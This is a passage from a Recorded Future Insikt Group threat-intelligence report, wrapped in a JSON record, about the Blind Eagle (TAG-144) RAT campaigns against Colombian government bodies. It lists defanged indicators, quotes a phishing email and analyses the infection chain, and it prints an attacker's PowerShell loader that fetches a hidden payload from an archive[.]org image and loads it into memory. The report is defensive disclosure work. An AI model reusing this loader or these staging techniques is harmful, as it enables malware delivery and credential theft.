{ "id": "14e6d164-99f4-438e-94a0-52ae09401f01", "created_at": "2026-04-29T02:20:51.52744Z", "updated_at": "2026-04-29T08:22:34.126697Z", "deleted_at": null, "sha1_hash": "ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f", "title": "TAG-144’s Persistent Grip on South American Organizations", "llm_title": "", "authors": "", "file_creation_date": "2025-08-25T15:18:08Z", "file_modification_date": "2025-08-25T15:18:25Z", "file_size": 4956660, "plain_text": "By Insikt Group®\r\nAugust 26, 2025\r\nTAG-144’s Persistent Grip on\r\nSouth American Organizations\r\nInsikt Group tracked five TAG-144\r\n(Blind Eagle) clusters with overlapping\r\nbut distinct TTPs, targeting many\r\nvictims, mainly in the Colombian\r\ngovernment, during 2024–2025.\r\nTAG-144 maintains extensive\r\ninfrastructure with VPS, Colombian\r\nISP IPs, and VPN-like servers hosting\r\ndomains via dynamic DNS services like\r\nduckdns[.]org, noip[.]com, and con-ip[.]\r\ncom, among others.\r\nTAG-144 uses various open-source and cracked RATs, delivered\r\nvia multi-stage chains using\r\nlegitimate internet services (LIS) and\r\nsteganography to hide malicious\r\ncontent and evade detection.\r\nCYBER\r\nTHREAT\r\nANALYSIS\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nNote: The analysis cut-off date for this report was July 21, 2025.\r\nExecutive Summary\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144 (also known as Blind Eagle).\r\nThese clusters have operated at various times throughout 2024 and 2025, targeting a significant\r\nnumber of victims, primarily within the Colombian government across local, municipal, and federal\r\nlevels. Although the clusters share similar tactics, techniques, and procedures (TTPs) such as\r\nleveraging open-source and cracked remote access trojans (RATs), dynamic domain providers, and\r\nlegitimate internet services (LIS) for staging, they differ significantly in infrastructure, malware\r\ndeployment, and other operational methods. Insikt Group also found further evidence linking TAG-144\r\nto Red Akodon and identified various compromised Colombian government email accounts likely used\r\nin spearphishing campaigns.\r\n \r\nTo protect against TAG-144, security defenders should block IP addresses and domains tied to\r\nassociated RATs, flag and potentially block connections to unusual LIS, and deploy updated detection\r\nrules (YARA, Sigma, Snort) for current and historic infections. Other controls include implementing email\r\nfiltering and data exfiltration monitoring. See the Mitigations section for implementation guidance and\r\nAppendix B for a complete list of IoCs. In the long term, analysts should continuously monitor the\r\ncybercriminal ecosystem for emerging threats and adapt controls accordingly.\r\n \r\n1 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nKey Findings\r\n●Insikt Group has tracked five distinct activity clusters associated with TAG-144 (Blind Eagle),\r\neach displaying overlapping yet varied TTPs and collectively targeting numerous victims,\r\nprimarily within the Colombian government, throughout 2024 and 2025.\r\n●TAG-144 appears to maintain an extensive operational infrastructure, comprising virtual private\r\nservers (VPS), IP addresses within Colombian ISP ranges, and servers that appear to function as\r\nVPN servers. These typically host domains registered through various dynamic DNS services\r\nsuch as duckdns[.]org, noip[.]com, and con-ip[.]com, among others.\r\n●TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT,\r\nDcRAT, REMCOS RAT, XWorm, and LimeRAT, among others. These payloads are typically\r\ndeployed through a multi-stage infection chain that leverages an expanding set of LIS and uses\r\nsteganography to obscure malicious content and evade detection.\r\n \r\n \r\n2 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nTable of Contents\r\nBackground4\r\nThreat Analysis6\r\nCluster 17\r\nCluster 210\r\nCluster 312\r\nCluster 412\r\nCluster 513\r\nInfection Chain14\r\nPhishing Email14\r\nSVG Attachment14\r\nStaging Process Using LIS16\r\nObfuscation17\r\nPowerShell Script19\r\nVictimology23\r\nOverlap with Red Akodon24\r\nMitigations25\r\nOutlook26\r\nAppendix A: Cluster 1 IP Addresses27\r\nAppendix B: Indicators of Compromise (IoCs)28\r\nAppendix C: Cluster 1 Victims41\r\nAppendix D: Cluster 2 IP Addresses43\r\nAppendix E: “deadpoolstart”-Themed Domains Linked to Cluster 244\r\nAppendix F: Cluster 2 Victims46\r\nAppendix G: Cluster 3 IP Addresses47\r\nAppendix H: Cluster 4 IP Addresses48\r\nAppendix I: Cluster 5 Domains49\r\nAppendix J: Original SVG Attachment50\r\nAppendix K: MITRE ATT\u0026CK Techniques51\r\n \r\n \r\n3 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nBackground\r\nTAG-144, also known as Blind Eagle, AguilaCiega, APT-C-36, and APT-Q-98, is a threat group that has\r\nbeen active since at least 2018, primarily targeting South America, especially Colombia. While the threat\r\ngroup’s overall motivation remains ambiguous, its activity reflects both cyber-espionage and financially\r\ndriven motivations. TAG-144’s primary focus appears to be on credential theft, evidenced by\r\nbanking-related keylogging and browser monitoring, alongside indications of espionage, such as\r\npersistently targeting government entities and using modified RATs with surveillance functions (1, 2).\r\n \r\nThe group’s primary targets include government institutions, especially judiciary and tax authorities,\r\nalongside financial entities, petroleum and energy companies, and organizations within the education,\r\nhealthcare, manufacturing, and professional services sectors (1, 2). Operations are mainly focused on\r\nColombia, with additional activity in Ecuador, Chile, and Panama, and occasional campaigns in North\r\nAmerica targeting Spanish-speaking users.\r\n \r\nInitial access typically occurs through spearphishing campaigns impersonating local government\r\nagencies, most notably Colombian authorities. These campaigns leverage themes such as debt\r\ncollection and judicial notifications to lure victims into opening malicious documents (1, 2). They have\r\noften used URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to to conceal malicious links and\r\ntarget users geographically. TAG-144 employs geo-fencing and other detection evasion measures that\r\nblock access from outside Colombia or Ecuador, redirecting outsiders to official government websites.\r\nTAG-144 has consistently leveraged compromised email accounts in its spearphishing campaigns,\r\nincluding those associated with government entities and private individuals.\r\n \r\nTAG-144 leverages a range of commodity remote access trojans (RATs), including AsyncRAT, REMCOS\r\nRAT, DcRAT, njRAT, LimeRAT, QuasarRAT, BitRAT, and a Quasar variant known as BlotchyQuasar. Its\r\ntooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors\r\nlike “Roda” and “pjoao1578”, with indicators pointing to the use of crypter-as-a-service offerings such\r\nas CryptersAndTools, which originates from Brazil. Additionally, it employs steganography techniques,\r\nembedding malicious payloads within image files to evade detection.\r\n \r\nTAG-144’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian\r\nISPs alongside virtual private servers (VPS) such as Proton666 and VPN services like Powerhouse\r\nManagement, FrootVPN, and TorGuard (1, 2). This setup is further enhanced by the use of dynamic DNS\r\nservices, including duckdns[.]org, ip-ddns[.]com, and noip[.]com. The threat group is suspected,\r\nthough not definitively confirmed, to use compromised routers, which are then repurposed as reverse\r\nproxies to obscure the true locations of their C2 servers and complicate attribution.\r\n \r\nThe threat group has consistently leveraged LIS, particularly during the payload staging phase. These\r\nservices include widely used platforms like Bitbucket, Discord, Dropbox, GitHub, Google Drive,\r\nPaste.ee, and lesser-known platforms such as undisclosed Brazilian image-hosting websites.\r\nAdditionally, the group has been observed using compromised accounts to host malicious content,\r\n \r\n4 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nincluding a Google Drive folder tied to a compromised account associated with a regional Colombian\r\ngovernment organization.\r\n \r\nThe threat group's origin remains uncertain, though multiple studies suggest it operates within the\r\nUTC-5 or UTC-4 time zones (1, 2), consistent with countries like Colombia and Ecuador, with some\r\nresearch specifically pointing to Colombia as its base. Notably, technical artifacts have contained both\r\nSpanish- and Portuguese-language comments. The Spanish observed in the comments closely\r\nresembles the regional dialects commonly spoken in the targeted countries. Additionally, the threat\r\ngroup has been observed using tools and services tied to the Brazilian cybercriminal underground,\r\nindicating a possible connection with Brazilian threat actors.\r\n \r\nThree key factors set TAG-144 apart within the cybercriminal ecosystem. First, while globalization,\r\ncybercriminal collaboration, and hardware/software standardization have lowered barriers for threat\r\nactors to operate globally, threat actors, including TAG-144, often remain regionally focused due to\r\ncultural nuances, tacit knowledge, and persistence. Second, despite some tooling improvements,\r\nTAG-144 has largely relied on consistent techniques since its emergence. Their continued success,\r\nreflected in a high number of victims, underscores how well-established methods remain effective over\r\ntime. Lastly, TAG-144 exemplifies the increasingly blurred lines between cybercrime and espionage, a\r\ntrend that has become more prominent in the coming year. In this context, a comprehensive approach\r\nto tackling cyber threats becomes even more crucial, requiring improved defenses, deeper regional\r\nknowledge, and enhanced coordination.\r\n \r\n \r\n \r\n5 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nThreat Analysis\r\nInsikt Group identified five activity clusters associated with TAG-144 that were active between May\r\n2024 and July 2025 (see Figure 1). Activity periods were determined based on domain resolutions,\r\nsample submissions, and victim traffic, as observed through Recorded Future® Network Intelligence.\r\n \r\n \r\nFigure 1: Cluster activity timelines (Source: Recorded Future)\r\n \r\nThe following clusters have been observed:\r\n \r\n●Cluster 1, active from February through July 2025, comprises C2 IPs primarily associated with\r\nTorGuard VPN and one Colombian ISP hosting duckdns[.]org and, starting in July 2025,\r\nnoip[.]com domains with static resolution and minimal rotation. Cluster 1 is linked to DcRAT,\r\nAsyncRAT, and REMCOS RAT infections targeting Colombian government entities exclusively.\r\n●Cluster 2, active between September and December 2024, included C2 IPs tied to\r\nAS-COLOCROSSING, Colombian ISPs, and VULTR hosting duckdns[.]org, con-ip[.]com, and\r\nkozow[.]com domains. Cluster 2 is associated with AsyncRAT activity targeting the Colombian\r\ngovernment and entities in the education, defense, and retail sectors.\r\n●Cluster 3, active from September 2024 to July 2025, consists of C2 IPs linked to Colombian ISP\r\nUNE EPM hosting duckdns[.]org and, occasionally, con-ip[.]com domains. Cluster 3 is\r\nassociated with both AsyncRAT and REMCOS RAT deployments.\r\n●Cluster 4, active from May 2024 to February 2025, is notable for combining malware and\r\nphishing infrastructure attributed to TAG-144.\r\n \r\n6 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n●Cluster 5, active from March to July 2025, consists of C2 IPs linked to GLESYS (AS42708)\r\nhosting dynamically resolving duckdns[.]org domains. Cluster 5 is associated with LimeRAT and\r\na cracked AsyncRAT variant seen in Clusters 1 and 2.\r\n \r\nInsikt Group identified infrastructure overlaps between the clusters, establishing a connection among\r\nthem. Additionally, the clusters share notable similarities in TTPs, including infrastructure choices,\r\ndomain naming patterns, malware deployment, and the abuse of LIS. However, each cluster also\r\nexhibits distinct differences, which are explored in detail in the following sections of this report.\r\nCluster 1\r\nInfrastructure Analysis\r\n \r\nCluster 1, active from at least February through July 2025, comprises C2 IP addresses primarily linked\r\nto TorGuard VPN servers and, in one case, a Colombian ISP. This cluster typically hosts duckdns[.]org\r\nand, more recently, noip[.]com domains with specific naming patterns; it has also been observed\r\ndeploying DcRAT, AsyncRAT, and REMCOS RAT. The IP addresses linked to Cluster 1 are listed in\r\nAppendix A. The domains consistently resolve to the same static IP addresses over time, with minimal\r\nrotation observed within Cluster 1.\r\n \r\nThe subdomain names, likely generated by a domain generation algorithm (DGA), commonly include the\r\nword “envio” followed by a numeric part, as in, for example, envio16-05[.]duckdns[.]org. The names are\r\ndetectable via the regex in Figure 2 and are detailed in Appendix B.\r\n \r\nenvio[0-9\\-]{2,5}\\.duckdns\\.org\r\nFigure 2: Regex for suspected DGA linked to Cluster 1 (Source: Recorded Future)\r\n \r\nWhile prior research has suggested that the TorGuard VPN servers associated with Cluster 1 are used\r\nfor port forwarding, the exposure of C2 components, such as default transport layer security (TLS)\r\ncertificates tied to deployed malware families, indicates these IP addresses are likely dedicated VPN\r\ninstances directly controlled by TAG-144.\r\n \r\nIn addition to the TorGuard VPN servers, Cluster 1 includes IP addresses associated with Colombian\r\nISPs, such as Colombia’s primary provider, COLOMBIA TELECOMUNICACIONES S.A. E.S.P. While earlier\r\nreporting on Blind Eagle in 2020 suggested the possible use of compromised routers for C2\r\ninfrastructure, Insikt Group has not confirmed such activity for the observed IP addresses.\r\n \r\nNotably, several domains hosted on TorGuard VPN servers listed in Appendix A were previously\r\nresolved to IP addresses belonging to Colombian ISPs, such as trabajonuevos[.]duckdns[.]org. These IP\r\naddresses and their associated domains are detailed in Appendix A. Similarly, certain domains, such as\r\ndiazpool14[.]duckdns[.]org, were previously hosted on IP addresses linked to GLESYS (AS42708), an\r\nASN identified in association with Cluster 5.\r\n \r\n7 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAbuse of Legitimate Internet Services, Including lovestoblog[.]com\r\n \r\nAs is typical for TAG-144, Cluster 1 has leveraged various LIS during staging, such as Tagbox, Archive,\r\nPaste.ee, Discord, and BitBucket, and for the first time in TAG-144 activity, the free hosting platform\r\nlovestoblog[.]com by InfinityFree. More specifically, the subdomain sudo102[.]lovestoblog[.]com hosted\r\nseveral text files that loaded an encoded PowerShell script, which retrieved the next stage of the\r\ninfection chain from a JPG image hosted on archive[.]org. (See Figure 3 for the infection chain; line\r\nbreaks were added for readability.)\r\n \r\n$craploads = 'SilentlyContinue'\r\n$islamist =\r\n'https://archive[.]org/download/new_image_20250531_1942/new_image.jpg'\r\n$seiche = New-Object System.Net.WebClient\r\n$seiche.Headers.Add('User-Agent', 'Mozilla/5.0')\r\n[byte[]]$homophobes = $seiche.DownloadData($islamist)\r\n$rythmic = [System.Text.Encoding]::UTF8.GetString($homophobes)\r\n \r\n$protamphirhine = 'INICIO\u003e\u003e'\r\n$unrubberized = '\u003c\u003cFIM\u003e\u003e'\r\n$petrograph = $ither\r\n \r\n$formylation = $rythmic.IndexOf($protamphirhine)\r\n$inconveniency = $rythmic.IndexOf($unrubberized)\r\n \r\nif ($formylation -ne -1 -and $inconveniency -ne -1 -and $inconveniency -gt\r\n$formylation) {\r\n $formylation += $protamphirhine.Length\r\n $petrograph = $rythmic.Substring($formylation, $inconveniency -\r\n$formylation)\r\n}\r\n \r\n$higgsinos =\r\n'#x#.e13ba2379fd20168b9c460418b963234_oviuqra/moc.golbo#sevol.201odus//:p##h'\r\n$higgsinos = $higgsinos.Replace('#', 't')\r\n$petrograph = $petrograph.Replace('@', 'A')\r\n \r\n$MacArthur = [System.Convert]::FromBase64String($petrograph)\r\n$aginator = [Reflection.Assembly]::Load($MacArthur)\r\n \r\n$towelette = [dnlib.IO.Home].GetMethod('VAI').Invoke(\r\n $ither,\r\n [object[]]@(\r\n $higgsinos,\r\n '', '', '',\r\n 'MSBuild', '', '', '', '',\r\n 'C:\\Users\\Public\\Downloads',\r\n \r\n8 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n 'Mattagami',\r\n 'js', '', '',\r\n 'duparted',\r\n '2', ''\r\n )\r\n)\r\nFigure 3: Payload hosted on archive[.]org URL (Source: Recorded Future)\r\n \r\nAt least one text file hosted on sudo102[.]lovestoblog[.]com included comments in Portuguese (for\r\nexample, “Junta os comandos,” which translates to “Add the commands”), a characteristic previously\r\nobserved in connection with Blind Eagle (1, 2). This was suspected to indicate possible collaboration\r\nbetween the threat actor and external threat groups; however, it could also be explained by the\r\npresence of Portuguese-speaking members, code reuse, or intentional false flag operations.\r\n \r\nMalware\r\n \r\nInsikt Group observed Cluster 1 using both the “1.0.7” version of AsyncRAT and a variant labeled\r\n“CRACKED BY hxxps://t[.]me/xworm_v2”, which has the mutex AsyncMutex_6SI8OkPnk. xworm_v2 is\r\nan active Telegram channel with over 300 members, known for sharing and distributing cracked\r\nversions of paid software.\r\n \r\nFigure 4: Telegram channel hxxps://t[.]me/xworm_v2 (Source: Recorded Future)\r\nThe cracked version observed in connection with TAG-144 was linked to a threat actor tracked as Red\r\nAkodon in May 2024; it appeared again in June 2025 in a report potentially referencing the same threat\r\nactor based on observed TTPs, though without formal attribution.\r\n \r\n9 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nVictimology\r\n \r\nUsing Recorded Future Network Intelligence, Insikt Group identified a significant number of victims\r\nexclusively linked to the Colombian government associated with Cluster 1 (see Appendix C). Network\r\ncommunications, as observed by Recorded Future Network Intelligence, began in March 2025 and\r\nended in June 2025. Notably, the cessation of activity may indicate that the threat actors were either\r\nevicted, completed their objectives and withdrew voluntarily, or transitioned to other tooling and egress\r\npoints.\r\nAs shown in Appendix C, multiple victims were observed communicating with several C2 servers\r\nassociated with Cluster 1. This activity likely resulted from changes in DNS resolution for the C2\r\ndomains over time. In some instances, Insikt Group assesses that multiple infections occurred within\r\nthe same victim network, with all compromised systems communicating with the C2 infrastructure\r\nthrough a shared egress point. In some cases, Insikt Group was unable to conclusively identify the\r\nexact victim due to multiple entities sharing the same name.\r\n \r\nInfrastructure Management\r\n \r\nAlthough the exact infrastructure management methods used by TAG-144 for Cluster 1 remain unclear\r\nat this time, Insikt Group identified indications that the threat group may have leveraged a compromised\r\nMikrotik router as a proxy to communicate with the C2 servers over a port.\r\nCluster 2\r\nInfrastructure Analysis\r\n \r\nCluster 2, active from at least September to December 2024, comprises C2 IP addresses primarily\r\nlinked to AS-COLOCROSSING, Colombian ISP IP addresses, and, in at least one case, VULTR. It typically\r\nhosts duckdns[.]org or con-ip[.]com domains with specific naming patterns and has been observed\r\ndeploying AsyncRAT. In a few cases, Insikt Group also observed domains linked to the free dynamic\r\nDNS provider kozow[.]com. The IP addresses linked to Cluster 2 are listed in Appendix D.\r\n \r\nThe subdomain names, likely generated by a DGA algorithm, often consist of Spanish words, as in\r\npesosdepesoslibras[.]duckdns[.]org. Sometimes, they are followed by numbers, as in\r\npaseoencarro2024[.]con-ip[.]com. (For a detailed list of these subdomain names, see Appendix A.)\r\nNotably, many of the domains currently hosted on AS-COLOCROSSING IP addresses (see Appendix D)\r\nwere previously associated with IPs from Colombian ISPs, such as 179[.]14[.]8[.]26,\r\n181[.]131[.]217[.]255, 177[.]255[.]84[.]82, and 191[.]88[.]248[.]162, indicating they may have been reused\r\nacross different hosting infrastructures.\r\n \r\nIn addition to the Spanish-themed domains, Insikt Group identified a large set of DuckDNS and CON-IP\r\ndomains, likely generated by another DGA algorithm and all starting with the keyword “deadpoolstart,”\r\n \r\n10 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nfollowed by a four-digit number (see Appendix E). Notably, the con-ip[.]com domains resolve to the\r\nAS-COLOCROSSING IP address 64[.]188[.]9[.]172, while the duckdns[.]org domains all resolve to IP\r\naddresses belonging to Colombian ISPs.\r\n \r\nAbuse of Legitimate Internet Services\r\n \r\nSimilar to Cluster 1, Cluster 2 has also been observed leveraging various LIS during staging, including\r\nGitHub, Archive, Paste.ee, and more recently, the free hosting platform lovestoblog[.]com by\r\nInfinityFree, which ultimately led to an XWorm infection using the C2 domain\r\ndeadpoolstart2064[.]duckdns[.]org.\r\n \r\nInsikt Group also identified a payload named RELACIÓN DE SALDOS - CUENTA DE COBRO.pdf.exe\r\nassociated with Cluster 2, which staged its content via two GitHub Gist URLs linked to the account\r\nSmikeY666:\r\n \r\n●hxxps://gist[.]githubusercontent[.]com/SmikeY666/50447c53097f8884ffc754a8779fa2a3/raw\r\n●hxxps://gist[.]githubusercontent[.]com/SmikeY666/8504274482e8e688d9489b302bfbc45e/raw\r\n \r\nThe payload results in an AsyncRAT infection, with the malware reaching out to its C2 server,\r\ncococovid202420242024[.]duckdns[.]org, which resolved to IP address 64[.]188[.]9[.]175 as of\r\nDecember 26, 2024.\r\n \r\nNotably, the GitHub account “SmikeY666” included a link to a 2024 Vimeo video demonstrating an\r\nallegedly cracked version of SilverRAT, a Windows-based RAT that first appeared in 2023. It has been\r\ndistributed across various forums and appears to be developed by an individual or group using the alias\r\nAnonymous Arabic.\r\n \r\nMalware\r\n \r\nInsikt Group observed Cluster 2 using the AsyncRAT variant labeled “CRACKED BY\r\nhxxps://t[.]me/xworm_v2” with the mutex AsyncMutex_6SI8OkPnk. Additionally, the cluster deployed\r\nAsyncRAT samples featuring custom mutexes such as tempcookieess, tempcokies, tempcookiee,\r\nWinCookies, Cookies, and CookiesGoogleChrome, among others. These samples can be tracked via\r\nRecorded Future Malware Intelligence. At least some of the samples are encrypted using a crypter\r\nattributed to Roda, a tool associated with Blind Eagle activity.\r\n \r\nVictimology\r\n \r\nUsing Recorded Future Network Intelligence, Insikt Group identified nine victims associated with Cluster\r\n2, primarily linked to Colombian government entities, along with victims from the education, defense,\r\nand retail sectors, among others (see Appendix F). Network communications observed by Recorded\r\nFuture began in early October 2024 and ended in December 2024.\r\n \r\n \r\n11 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAs with Cluster 1, multiple infections were observed within some of the victim organizations linked to\r\nCluster 2, suggesting broader targeting or possible lateral movement. There is also evidence of victim\r\noverlap between Clusters 1 and 2. Furthermore, based on high volumes of network traffic from\r\nColombian ISP IP addresses to C2 ports during the relevant timeframes, the actual number of victims is\r\nlikely higher than what has been confirmed.\r\nCluster 3\r\nCluster 3, active from at least September 2024 to July 2025, comprises C2 IP addresses primarily\r\nlinked to the Colombian ISP UNE EPM, typically hosting DuckDNS or, in rare cases, con-ip[.]com,\r\ndomains. Insikt Group has observed AsyncRAT as well as REMCOS RAT infections linked to Cluster 3.\r\nThe IP addresses linked to Cluster 3 are listed in Appendix G.\r\n \r\nThe subdomain names, likely generated using a domain DGA, often incorporate Spanish names, as in\r\nsebastiancorrea905040[.]duckdns[.]org, sometimes appended with numerical sequences. (For a\r\ndetailed list of these subdomain names, see Appendix B.) Notably, one of the domains associated with\r\nCluster 3, sebastianguerrero5040[.]con-ip[.]com, was observed resolving to the Cluster 2 IP address\r\n64[.]188[.]9[.]177 between at least September 11 and November 11, 2024.\r\n \r\nSimilar to Clusters 1 and 2, Cluster 3 has also been observed abusing multiple LIS, including Tagbox,\r\nArchive, and Paste.ee, among others.\r\nCluster 4\r\nCluster 4, active from at least May 2024 to February 2025, differs from the others in that it is not only\r\nassociated with malware infrastructure but also with phishing activity attributed to TAG-144. The IP\r\naddresses linked to Cluster 4 are listed in Appendix H. The full list of domains linked to the IP\r\naddresses in Appendix H is listed in Appendix A.\r\n \r\nThe phishing pages linked to Cluster 4 have been observed impersonating multiple banks, including\r\nBanco Davivienda, Bancolombia, and BBVA (see Figure 5). Notably, these lures differ from earlier ones\r\nattributed to TAG-144, which primarily impersonated government entities such as tax authorities or\r\njudicial bodies. Previous campaigns also appeared to target government-affiliated individuals or\r\norganizations, as evidenced by the victims associated with Clusters 1 and 2.\r\n \r\n \r\n12 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\n\nFigure 5: Phishing pages linked to Cluster 4 (Source: URLScan, URLScan, URLScan)\n\nNotably, a phishing page impersonating BBVA and hosted on the domain keepz[.]duckdns[.]org\ncontained the IP address 181[.]131[.]217[.]139 in its document object model (DOM), as seen in Figure 6.\nThis IP was hosting the domains env2023nue[.]duckdns[.]org and chichichi01[.]duckdns[.]org in 2023.\nThe domain env2023nue[.]duckdns[.]org was publicly linked to APT-C-36 (Blind Eagle) and likely\nremained in use by the same threat actor, as it continued to host an open directory containing folders\nrelated to Banco Davivienda, Banco Colombia, Banco Caja Social, and others until at least March 14,\n2024, while being hosted on IP address 179[.]14[.]9[.]152. The domain chichichi01[.]duckdns[.]org\nserved as a C2 domain for AsyncRAT based on public reporting and was also hosted on IP address\n179[.]14[.]9[.]152 between March 22 and May 8, 2024.\n\n…\n\nDirección IP: 181[.]131[.]217[.]139\n\nCopyright©2023 Bancolombia S.A.\n\n…\nFigure 6: IP address left in the DOM of a phishing page (Source: URLScan)\n\nCluster 5\nCluster 5, which has been active since at least March to July 2025, comprises C2 IP addresses primarily\nlinked to GLESYS (AS42708), typically hosting duckdns[.]org domains. The domains linked to Cluster 5\nare listed in Appendix I. Cluster 5 is the only cluster associated with the deployment of LimeRAT, which\nin this case uses the mutex 1e97ead369. The AsyncRAT variant linked to Cluster 5 is the same cracked\nversion identified in Clusters 1 and 2. Of note, the domains frequently resolve to changing IP addresses,\nwith those observed by Insikt Group detailed in Appendix B.\n\nSimilar to the other clusters, Cluster 5 has also been observed leveraging various LIS during staging,\nincluding Archive, Paste.ee, and Tagbox.\n\n13 CTA-2025-0826 Recorded Future\n®\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nInfection Chain\r\nPhishing Email\r\nInsikt Group identified an email sent to undisclosed recipients from a likely compromised domain,\r\nalcaldia[@]simacota-santander[.]gov[.]co, associated with the Mayor’s Office of Simacota in the\r\nSantander department of Colombia. Infections stemming from this email have been confirmed to result\r\nin AsyncRAT deployment, communicating with the C2 domain envio01[.]ddns[.]net, a domain previously\r\nlinked to Cluster 1.\r\n \r\nDe: Alcaldía Simacota Santander\r\n\u003cREDACTED\u003e\r\nEnviado el: martes, 1 de julio de 2025\r\n3:23 p. m.\r\nPara: undisclosed-recipients:\r\nAsunto: Cobro por intereses moratorios\r\n– Radicado 11001-28-05-03004\r\n \r\n¡Cuidado! este correo proviene de un\r\nusuario externo, no abras archivos\r\nadjuntos ni hagas clic en enlaces sin\r\nvalidar que el remitente y el\r\ncontenido sean seguros. Nunca\r\nentregues tu usuario ni contraseñas a\r\ntravés de enlaces.\r\n \r\nSe inicia ejecución por intereses\r\ncausados por pago extemporáneo.\r\nConsulte el archivo para liquidación\r\ndetallada.\r\n \r\n \r\nCordialmente,\r\nFrom: Simacota Santander Mayor's\r\nOffice \u003cREDACTED\u003e\r\nSent: Tuesday, July 1, 2025 3:23 p.m.\r\nTo: undisclosed-recipients:\r\nSubject: Collection of late payment\r\ninterest – File 11001-28-05-03004\r\n \r\nCaution! This email is from an\r\nexternal user. Do not open attachments\r\nor click on links without verifying\r\nthat the sender and content are\r\nsecure. Never provide your username or\r\npassword through links.\r\n \r\nA lawsuit has been filed for interest\r\naccrued due to late payment.\r\nSee the file for detailed settlement.\r\n \r\nSincerely,\r\nFigure 7: Text in phishing email linked to TAG-144 (left) and the English translation (right) (Source: Recorded Future)\r\nSVG Attachment\r\nThe email included an attachment named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_Juridico_sxyebfiv.sv\r\ng, which has a SHA256 hash of\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899. A translated version of\r\nthe attachment is presented in Figure 8, while the original Spanish version is available in Appendix J.\r\n \r\n14 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nThe SVG content claims that a judicial process has been initiated against the recipient, outlines potential\r\npenalties, and contains a link purportedly leading to evidence and further legal details.\r\n \r\nFigure 8: Translated SVG file sent via spearphishing email (Source: Recorded Future)\r\n \r\n \r\n15 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nStaging Process Using LIS\r\nThe link embedded within the SVG file is:\r\nhxxps://cdn[.]discordapp[.]com/attachments/1389692690454548634/1389692792590307338/\r\nNotificacion_electronica_sentencia_preliminar_Departamento_De-Justicia_01.js?ex=68658bc4\u0026i\r\ns=68643a44\u0026hm=057a0e76212bdd4c2da95e51ac7542f60ecbd440482ee186d474e1d783afd28\r\n8\u0026?id=75e6ea37-63e5-491a-a5e2-ad4c92667144\r\nA similar SVG sample was identified through a Malware Intelligence search for HTTP requests to\r\ncdn[.]discordapp[.]com that included “Notificacion” in the query string (see Figure 9).\r\n \r\nFigure 9: Additional sample found in Recorded Future Malware Intelligence (Source: Recorded Future)\r\nAlthough the cdn[.]discordapp[.]com link was inactive at the time of analysis, Insikt Group successfully\r\nextracted the downloaded JavaScript file from a PCAP capture. The file, named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_De-Justicia_01.js, has\r\nthe SHA256 hash 1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81. The\r\nscript contains a mix of malicious code and benign content related to the Microsoft Print Schema. The\r\nbenign portion is displayed in Figure 10. The inclusion of benign content is likely an attempt to evade\r\ndetection.\r\n \r\n16 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nFigure 10: Benign code portion contained in the JavaScript script (Source: Recorded Future)\r\nObfuscation\r\nFigure 11 shows the obfuscated malicious portion of the script. Notably, the code contains comments\r\nwritten in Portuguese, an aspect previously discussed in this report and also associated with activity\r\nlinked to TAG-144.\r\n \r\n17 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nFigure 11: Obfuscated malicious code portion contained in the JavaScript script (Source: Recorded Future)\r\n \r\nThe variables voicelessness and classe, unwellness, and isostasy are obfuscated using junk\r\ncharacters and later deobfuscated via string replacement operations. These variables resolve to the\r\nfollowing:\r\n \r\n●voicelessness and classe: MSXML2.ServerXMLHTTP.6.0\r\n●unwellness: hxxp://paste[.]ee/d/TrxwtHcC/0 (as observed via URLScan)\r\n●isostasy: GET\r\n \r\nThe script creates a ServerXMLHTTP object and issues a GET request to the specified paste[.]ee URL\r\nusing the custom User-Agent MyCustomAgent/1.0. If the HTTP response returns a status code 200,\r\nthe response body is executed as JavaScript.\r\n \r\nThe SHA256 hash of the response body is\r\n591744244c7ca9cea69cde263187efde3f65a157f8e5eb885ccc1f9e078b5572. This payload contains\r\nsimilar string obfuscation techniques and ultimately reconstructs strings to instantiate a shell object and\r\nexecute a deobfuscated command line.\r\n \r\n18 CTA-2025-0826 Recorded 